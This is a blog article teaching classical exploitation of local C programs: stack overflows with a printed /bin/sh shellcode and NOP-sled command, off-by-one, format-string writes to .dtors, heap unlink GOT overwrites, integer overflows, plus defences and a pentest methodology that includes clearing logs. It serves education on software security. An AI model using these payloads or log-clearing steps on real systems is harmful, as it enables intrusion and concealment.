Ethical hacking : a glimpse on local program vulnerabilities exploitation techniques
by Jerome Kehrli
Posted on Saturday Oct 08, 2016 at 12:19AM in Computer Science
Ethical hacking is a very interesting field, and a pretty funny hobby. Well, ya all penetration tester out there, don't get me wrong: I am well aware that Penetration testing and Ethical Hacking is a full and challenging Software Engineering Field and an actual profession, don't get upset.
I am rather saying that studying vulnerabilities exploitation techniques in one's free time is pretty fun and intellectually rewarding. With the all time and everywhere connection of everything for all kind of usages (understand Internet of Things), current focus in the field of vulnerabilities exploitation is really on Web application, networks, distributed systems, etc.
In addition, most recent progresses in CPU-level protections and compiler-level protections have made local programs exploitation techniques somewhat outdated and such techniques are not very much presented or discussed anymore.
During my master studies, I followed an extended set of lectures on Ethical Hacking and Software Security in general and got quite interested in the field. I wrote a paper for a study in the context of the university at that time which I am reporting today in this blog.
The following article presents various classical vulnerabilities exploitation techniques on local programs.
Summary
- 3. Introduction to memory manipulation
- 4. Stack overflows
- 5. Stack off-by-one
- 6. Format String bugs
- 6.1 Introductory example
- 6.2 Read enviromnent variables
- 6.3 Overwriting any word in memory
- 6.4 Practice : overwriting the
.dtors
section
- 7. Heap overflow
- 7.1 Heap organisation
- 7.2 Free chunks
- 7.3 Defragmentation
- 7.4 Heap overflow
- 7.5 Heap overflow Exploitation
- 8. Integer Overflows
- 9. Protections against Overflows
- 9.1 Canaries
- 9.2 Protections implemented in GCC
- 9.3 Address Space Layout Randomization - ASLR
- 9.4 Other possible protections
- 10. Exploitation frameworks
1. Ethical hacking methodology
In regards to ethical hacking, there is some sort of a methodology on which pen testers and ethical hackers commonly agree.
This methodology is as follows:
Information Gathering
This is Fully passive phase.
- The goal is to find all possible useful information about the target.
- Company / persons
- DNS / WHOIS / ...
- Search engines, newsgroups, mailing lists
- Information mainly collected from public sources
- Allows to identify the points that will be most likely vulnerable
Network Mapping
First, as a prerequisites, one might need with the results from the previous step to gather the IP address ranges allocated to the target.
The network mapping consists of building a Foot-Print of the network (i.e. foot-printing :
- Finding of live hosts
- Port and service scanning
- Perimeter network mapping (router, firewalls)
- Identification of critical services
- OS fingerprinting
- Service fingerprinting
=> Simply anything the nmap command can do
Vulnerability Identification
At this stage on tries to answer to
- What type of server ?
- What OS ?
- Wich version of OS ? services ? Patched or vulnerable ?
The goals are :
- Identification of vulnerable services (banners)
- Vulnerability scan (SecurityFocus, CVE, CERT)
- Verification
- Enumerate discovered vulns
- Estimate probable impact
- Identify attack paths and scenarios for exploitation
Penetration / Exploitation
Now it's about attempting to exploit the previously discovered vulnerabilities. The exploit can be searched by whatever means (internet, database, tools such as metasploit, etc.)
- Find proof of concept, tool
- Development of tools/scripts
- Testing of proof of concept
- Verify or disprove vulnerabilities
- Documentation of findings
Gaining access and Privilege Escalation
Gaining access :
- Discovery of username/password combinations
- Blank/default passwords
- Exploitation of vendor default settings
- Discovery of public services that allow for certain operations within the system
Privilege Escalation :
- Get administrative rights, if not yet done
- Exploitation of a local vulnerability
Further enumeration
This consisis in repeating the previous phases iteratively in order to reach further targets. (for instance from a DMZ to penetrate an internal network)
- Obtain encrypted passwords (offline cracking)
- Obtain passwords using sniffing or other techniques
- Traffic sniffing
- Cookies gathering
- Internal network mapping
Compromise of remote users/servers
Break other (internal) services and if possible and iterate the process.
Maintaining access
- Use of covert channels (protocol tunnels, VPNs, etc.)
- Backdoors
- Rootkits
Covering tracks
The problem is that the previous steps usually leave lots of traces in the various system logs. One should attempt to get rid of these traces.
- Hide files
- Clear logs : Check history, Edit log files, Identify remote logging, etc.
- Defeat protection mechanisms : Integrity checking, Anti-virus
2. A focus on Exploitation
This article focuses on exploitation of vulnerabilities related to local programs. We will look at various way to exploit local programs vulnerabilities, especially in the C language.
Most of the techniques presented here, thanks to latest progresses in both hardware (processors) and software (compilers), are not so easily exploitable in practice.
The purpose of the following elements is really to present the basic techniques and the key concepts behind them.
3. Introduction to memory manipulation
Memory manipulation attacks consist in sending malformed data to the target application in such a way that the logical program flow is affected.
Goals :
- Be able to execute arbitrary code
- Crash the application (DoS)
3.1 Runtime Memory Organization
The Memory layout of a running process on x86 is as follows :
- Stack
- Heap
- BSS segment
- Data segment
- Text segment
3.1.1 Text Segment
This segment contains all the compiled executable code for the program. It is (Usually) non-writable :
- Code does not contain any sort of variables
- Read-only segments can be shared between different copies of the program executing simultaneously
3.1.2 Data and BSS Segments
Those segments contain all the global variables.
- Read/write/execute rights (at least on Intel)
- Data segment contains initialized variables
- BSS segment contains un-initialized variables
3.1.3 Stack
The stack is the region of memory used to dynamically store and manipulate most program functions variables (i.e., local variables)
- Can (usually) be written, red and executed.
- When a program enters a function, space on the stack is provided for variables and data (this space is called a stack frame).
The Stack frame contains :
- Function's argument(s)
- Stack variables (saved instruction and frame pointers)
- Space for local variables
3.1.4 Heap
Programs use the heap to store data that must exist after a function returns (and its stack frame is erased). The heap is often the largest segment of memory.
Allocator and de-allocator algorithms manage the heap :
- In C:
malloc()
/free ()
- In C++:
new
/delete
3.2 Processor Registers (IA32)
eip
: instruction pointer
ebp
: frame pointeresp
: stack pointer4. Stack overflows
The Stack overflow exploit is one of the classical security holes. Currently, OS implements stack smashing protections making such stack overflow exploits more difficult to exploit...
4.1 Introductory example
Consider the following tiny C program:
int main (int argc, char **argv) { char smallbuf[32]; strcpy (smallbuf, argv[1]); printf ("%s\n", smalbuf); return 0; }
In memory, the frame for method main stands as follows. We specifically see where the smallbuf
array is located,
right below the Saved instruction pointer and the Saved frame pointer :
Let's try to smash the stack by running the program (the main function) this way :
gcc -o print print.c $ ./print ABCDABCDABCDABCDABCDABCDABCDABCDABCDABCD ABCDABCDABCDABCDABCDABCDABCDABCDABCDABCD Segmentation fault
What happened ?!? Let's look at the memory again :
4.2 Shell code
Now smashing the stack is fun but what we want is get access to the compromised host. Most often what we eant is a shell code :
- Machine code executing something useful
- Shape is heavily OS- and architecture dependent
For instance, on Linux / IA32, this is a binary runnable code launching a shell /bin/bash
:
"\x31\xc0\x50\x68\x6e\x2f\x73\x68" "\x68\x2f\x2f\x62\x69\x89\xe3\x99" "\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
4.2.1 Back to our example program
We pad the shell code with NOP instructions (NOP sled)
"\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xc0\x50\x68\x6e\x2f\x73\x68" "\x68\x2f\x2f\x62\x69\x89\xe3\x99" "\x52\x53\x89\xe1\xb0\x0b\xcd\x80" "\xef\xbe\xad\xde\x18\xf4\xff\xbf"
and the last line contains the values we want to put in both pointers, most importantly the aved instruction pointer.
And we give it as input to the vulnerable program (playing the exploit)
$ ./print 'perl -e 'print "\x90\x90\x90\x90\x90\x90\x90\x90\x31 \xc0\x50\ x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52 \x53\x89\xe1\xb0\x0b\ xcd\x80\xef\xbe\xad\xde\x18\xf4\xff\xbf";'' 1ÀPhn/shh//biãRSá° Í $
The stack layout during execution is as follows :
4.2.2 Principle
- put a shell code in a buffer
- pad the beginning with enough NOP
- put in the Save Instruction Pointer one of the addresses containing a NOP
5. Stack off-by-one
This is a variation on the stack overflow. It implies conditions where a program miscalculates a data copying operation
and allows one byte to flow past the end of the buffer.
Exploiting this vulnerability, it may be possible to overwrite the least significant byte (LSB) of the saved frame
pointer, which could later allow complete control over program flow.
5.1 Illustration example
We wont develop this example as far as exploiting the flaw, but we'll use it to illustrate the vulnerability.
Let's look at the following program :
int main(int argc, char *argv[]) { if(strlen(argv[1]) > 32) { printf("Input string too long!\n"); exit (1); } vulfunc(argv[1]); return 0; } int vulfunc(char *arg) { char smallbuf[32]; strcpy(smallbuf, arg); printf("%s\n", smallbuf); return 0; }
The problem with this code is that there is always an additional NULL character at the end of a string, but the
strlen
function never takes it into account.
5.1.1 Let's play with it
$ gcc -o print print.c $ ./print test test $ ./print ABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCD Input string too long! $ ./print ABCDABCDABCDABCDABCDABCDABCDABC ABCDABCDABCDABCDABCDABCDABCDABC $ ./print ABCDABCDABCDABCDABCDABCDABCDABCD ABCDABCDABCDABCDABCDABCDABCDABCD Segmentation fault (core dumped)
5.1.2 What happened ?
This is the stack as it should be :
This is the after the exploit. We can see that we have been able to overwrite the LSB of the Save frame Pointer :
5.2 Exploitation
The whole game is to find a way to put some shell code somewhere on the stack and to use the buffer off-by-one overflow to redirect the program flow to this buffer. The details exceed the scope of this document.
5.3 Remarks
Interestingly, not all architectures are (potentially) vulnerable :
- x86, Dec Alpha : little endian ordering -> vulnerable
- Spart, SGm IBM RS/600, PowerPC : big endian ordering -> Off-by-one shoot you to an address far away.
In practice :
- Padding added by compilers
- Canary values
- Non-executable stacks
- -> More more work is required...
6. Format String bugs
The printf
function is a special function which can take an infinite number of arguments. The problem is that
if one specifies a format which required a certain number of arguments but omits them, printf
will
nevertheless take the values located on the stack at the place it expected its arguments.
In addition, printf
supports the %x
flag which display what is stored at the address given as
argument to printf
(which might be omitted).
6.1 Introductory example
int main(int argc, char *argv[]) { if(argc < 2) { printf("You need to supply an argument\n"); return 1; } printf(argv[1]); return 0; }
6.1.1 Let's play with it
$ ./printf "Hello, world!" Hello, world! $ ./printf %x b0186c0 $ ./printf %x.%x.%x.%x b0186c0.cfbfd638.17f3.0
This program is kind of a Stack dumper : one can dump the content of the stack starting from a certain address. (an the stack contains lots of interesting stuff : environment variables, arguments given to the program, function arguments, etc.)
6.1.2 Principle
With the above example, one can dump pretty much any value located in this area :
6.2 Read environment variables
I know that the program environment variables are stored around address 0xBFFFFF600
:
$ ./printf 'perl -e 'print "%53\$s" . "AA" . "\x80\xf6\xff\xbf"';' TERM=xtermAA...¿Ï
6.3 Overwriting any word in memory
Man page of printf
tells us about the %n specifier: %n
The number of characters written so far is stored into
the integer indicated by the int * (or variant) pointer argument. No argument is converted.
Hence, by supplying a pointer to the memory you wish to overwrite and issuing the %n specifier, you write the number of
characters that printf
has written so far directly to that memory address.
Here is a nice format string:
%.0(pad 1)x%(arg number 1)$hn%.0(pad 2)x%(arg number 2) \ $hn(address 1)(address 2)(padding)
(pad 1)
(pad 2)
(arg number 1)
(arg number 2)
(address 2)
(padding)
6.4 Practice : overwriting the .dtors
section
The .dtors
section contains a series of pointers on functions to be executed when a program exits. By
overwriting them, one can execute any arbitrary code at the end of a program execution.
We will consider here the introductory program, which we will exploit using the following format string:
$ gcc -o printf printf.c $ ./printf 'perl -e 'print "%.048879x" . "%114\$hn" . "%.08126x" \ . "%115\$hn" . "\x44\x95\x04" . "\x08\x46\x95\x04\x08" . "A"';'
The format string is thus equal to
%.048879x%105$hn%.08126x%106$hn\x44\x95\x04\x08\x46\x95\x04\x08
Knowing that the .dtors section was assumed to begin at address 0x08049540
, one can analyse this format string
this way:
The printf()
routine begins by writing 48879 characters thanks to the %x
format command, whose
content is not interesting. Then, the %n
command writes the number of bytes written so far (i.e., 48879 or
0xBEEF
in hexadecimal) in the content of the address given as the 105th argument of printf()
, i.e.,
the address 0x08049540
.
Note that when one writes a "short", i.e., only 2 bytes. The format string write another 8126 characters (where we do
not care about the content).
Then, it writes the number of characters written so far, which is 48879+8126=57005
(or 0xDEAD
in
hexadecimal) in the address pointed by the 106th argument, which is 0x08049546
. Hence, this format string
writes the value 0xDEADBEEF
at the address 0x08049544
.
7. Heap overflow
A common heap implementation is as follows (of course, there might be variations, for instance for performance reasons):
- Available memory is divided into chunks
- Each chunk contains :
- A header structure
- Free space for the user
7.1 Heap organisation
- The size element also specifies in its LSB whether the previous chunk is free or not
- This information bit is called
PREV_INUSE
- Example:
size == 0x30
(40-byte buffer, previous chunk free)
size == 0x31
(40-byte buffer, previous chunk in use) - Consequence :
malloc()
should always allocate multiple of at least 2 bytes - In practice : The minimum size of a chunk is always 16 bytes
7.2 Free chunks
Free chunks are stored in a doubly linked list :
free()
does (approximately) as follows:
- The
PREV_INUSE
bit is cleared - The addresses of the previous (bk pointer) and next (fd pointer) free chunks are placed in the chunk's data section
- Adjacent free chunks are merged (defragmentation operation)
In the light of this, the heap organisation is as follows :
7.3 Defragmentation
Defragmentation operation of two chunks happens as follows :
- Adding the sizes
- Removing the second chunk from the doubly-linked list using the following
unlink()
macro below.
#define unlink(P, BK, FD) \ FD = P->fd; \ BK = P->bk; \ FD->bk = BK; \ BK->fd = FD; \
7.4 Heap overflow
If you can overflow a buffer on the heap, you may be able to overwrite the chunk header of the next chunk on the heap.
Example of vulnerable program:
int main(void) { char *buff1, *buff2; buff1 = malloc(40); buff2 = malloc(40); gets(buff1); free(buff1); exit(0); }
- Two 40-bytes buffers are assigned on the heap
buff1
is used to store user-supplied input (without length checking thereof)- Hence, a heap overflow can potentially occur !
In memory, this takes place as follows :
7.5 Heap overflow Exploitation
- Idea: make buff2 to be "merged" - Overwrite the size element of
buff2
with thePREV_INUSE
bit unset. - Some constraints
prev_size
and size are added to pointers so they must have small absolute valuesfd + size + 4
must point to a value whose least significant bit is 0 to fool the heap management algorithm into thinking that the chunk after next is also free.- There must be no
0x00
byte in the overflow string, or gets() will stop process it.
What happens when free()
deallocates buff1
, as required ?
- It checks to see if the next forward chunk is free
- Because the size element of the second chunk (
buff2
) is equal to -4, the algorithm reads thePREV_INUSE
flag from the second check, believing it is the third - The algorithm tries to consolidate the chunks into a new, bigger one, processing the fake
fd
andbk
pointers as#define unlink(P, BK, FD) { \ FD = P->fd; \ BK = P->bk; \ FD->bk = BK; \ BK->fd = FD; \ }
fd + 12
is overwritten withbk
bk + 8
is overwritten withfd
In summary, you can overwrite a 4-byte work of your choice anywhere in memory with the values stored
in the fake fd
and bk
pointers
How to concretely exploit this ? For instance :
- Linux Executable File Format (ELF)
- Global Offset Table (GOT) : Contains addresses of various functions
.dtors
section : contains addresses of functions that perform cleanup work when a program exit- Use
fd
= GOT address ofexit() - 12
- Use
bk
= shell-code address (i.e.,buff1
) - It means that you will overwrite the GOT entry for
exit()
with the address ofbuff1
- At the end of the
main()
, you execute your shellcode instead ofexit()
8. Integer Overflows
8.1 Principle
The idea is to identify where an integer is used for a buffer allocation and use the integer overflow to write a value much bigger that the wrongly allocated buffer.
Integer overflow over 32-bit values:
int a = 0xffffffff; int b = 1; int r = a + b;
results in r == 0x00000000
...
8.2 Example
Imagine a user can tell the size of a data chunk to an application ...
Example :
int myfunction(int *array, int len) { int *myarray, i; myarray = malloc(len * sizeof(int)); if(myarray == NULL) { return -1; } for(i = 0; i < len; i++) { myarray[i] = array[i]; } return myarray; }
In the code above, if one can master the value of the parameter len
, he can screw the malloc right below:
- If the parameter is very long, like
len = 0x40000001
, we have
0x40000001*sizeof(int)
= 0x40000001*4
= 0x100000004
== 0x00000004
malloc()
will allocate a 4-byte buffer, and we will write a much larger buffer.- This can trigger a heap overflow
9. Protections against Overflows
9.1 Canaries
Canaries are specific values placed between a buffer and sensitive data on the stack. This is an analogy to the mine workers who used to take a little canary bird with them in the mine. When the air was getting scarce or when unexpected gaz shown up, the canary died and they knew they had to run out.
- If an overflow occurs, then the canary will be overwritten
- Canary check code should detect this.
Type of canaries:
- Terminators : Built of 0x00, CR, LF or -1 values -> Known to an adversary.
These are the simplest ones. They're easily countered : one only needs to write the canary back after the overflow occurred. - Random : Random value generated at program initialization and stored as a «protected» global variable
This is a little more difficult to counter, yet it's still feasible. - Random XORing Canary built out of a random XORed with the sensitive data. Hence, it depends also on those
sensitive data
These are much more difficult to control by an attacker. For instance one can XOR the random variable and the return pointer -> depends on the data.
9.2 Protections implemented in GCC
These protections are called ProPolice. The Main features are :
- Protects all registers saved in a function's prologue (saved EBP, saved EIP)
- Add canaries
- Sort array variables to the highest part of the stack frame
- Creates copies of the function's argument and relocates them with local variables
9.3 Address Space Layout Randomization - ASLR
The idea is to arrange in a random way in the process address space the positions of key data areas :
- Executable code
- Library entry points
- Heap
- Stack
... either statically or at runtime.
- Linux : Weak form since kernel 2.6.12. Patches exist for better implementation
- MS Windows : Vista + Server 2008 have ASLR enabled by default but only for few executables (can be forced for others)
- Max OS X : Some library offset are randomized as of Mac OS X 10.5
9.4 Other possible protections
- Non-executable stack
- dedicated hardware. For instance, HW-based code authentication or the Same kind of mechanisms to avoid fault attacks
- Program obfuscation (avoids mass exploits)
10. Exploitation frameworks
Exploitation frameworks are software packages that contain
- Reliable exploit modules
- Agents for re-positioning
- Obfuscation methods
- ...
Examples:
- Metasploit Framework (free)
- CORE IMPACT (commercial)
- Immunity CANVAS (commercial)
Metasploit Framework
Available freely through http://www.metasploit.com.
Three main components :
- MSF Interface (cli and GUI)
- Modules
- Payloads
Using MSF in a nutshell
- Select the exploit module to use
- Select the exploit payload to use
- Select the target host and delivery vector
- Set exploit target and payload options